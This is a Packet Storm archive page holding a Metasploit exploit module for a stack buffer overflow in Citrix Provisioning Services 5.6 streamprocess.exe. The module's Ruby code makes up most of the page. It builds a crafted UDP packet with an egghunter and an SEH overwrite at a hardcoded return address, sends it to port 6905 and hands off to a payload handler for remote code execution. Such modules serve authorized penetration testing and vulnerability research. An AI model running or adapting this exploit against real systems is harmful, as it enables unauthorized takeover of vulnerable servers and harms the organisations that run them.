exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
Posted Jun 27, 2011
Authored by mog | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Citrix Provisioning Services 5.6. By sending a specially crafted packet to the Provisioning Services server, a fixed length buffer on the stack can be overflowed and arbitrary code can be executed.

tags | exploit, overflow, arbitrary
advisories | OSVDB-70597
SHA-256 | fb43ad978d094b4e0f5330487cfca72d9843827148a253d984b6ba140c463080

Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

Change Mirror Download
##
# $Id: citrix_streamprocess.rb 13042 2011-06-27 18:00:12Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.
By sending a specially crafted packet to the Provisioning Services server, a fixed
length buffer on the stack can be overflowed and arbitrary code can be executed.
},
'Author' => 'mog',
'License' => MSF_LICENSE,
'Version' => '$Revision: 13042 $',
'References' =>
[
[ 'OSVDB', '70597'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-023/' ],
[ 'URL', 'http://secunia.com/advisories/42954/' ],
[ 'URL', 'http://support.citrix.com/article/CTX127149' ],
],
'DefaultOptions' =>
{
# best at delaying/preventing target crashing post-exploit
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'BadChars' => "\x00", # Only "\x00\x00" breaks the overflow, but this is safer
},
'Platform' => 'win',
'Targets' =>
[
# pop/pop/ret in streamprocess.exe
# Service runs and automatically shuts down in Win 7
[ 'Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista', { 'Ret' => 0x00423d32 } ],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 20 2011'))

register_options([Opt::RPORT(6905)], self.class)
end

def exploit

eggoptions =
{
:checksum => true,
:eggtag => 'W00t',
}
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

sploit = "\x10\x00\x02\x40" # message type
sploit << rand_text_alpha_upper(30)
sploit << "\x00\x01\x00\x00" # length field
sploit << rand_text_alpha_upper(400)
sploit << hunter
sploit << rand_text_alpha_upper(64 - hunter.length)

sploit << "\xEB\xBE" # Jump back 66 bytes to hunter because there's
sploit << rand_text_alpha_upper(2) # only 24 bytes of cyclic copy after ret
sploit << [target.ret].pack('V') # SE handler

sploit << rand_text_alpha_upper(50) # Need >= 24 bytes to keep the tag out of the stack
sploit << egg # Payload has a whole page to itself

print_status("Trying target #{target.name}...")

connect_udp
udp_sock.put(sploit)
print_status("Exploit sent, wait for egghunter.")
select(nil, nil, nil, 4) # takes about 8 seconds in tests

handler(udp_sock)
disconnect_udp
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close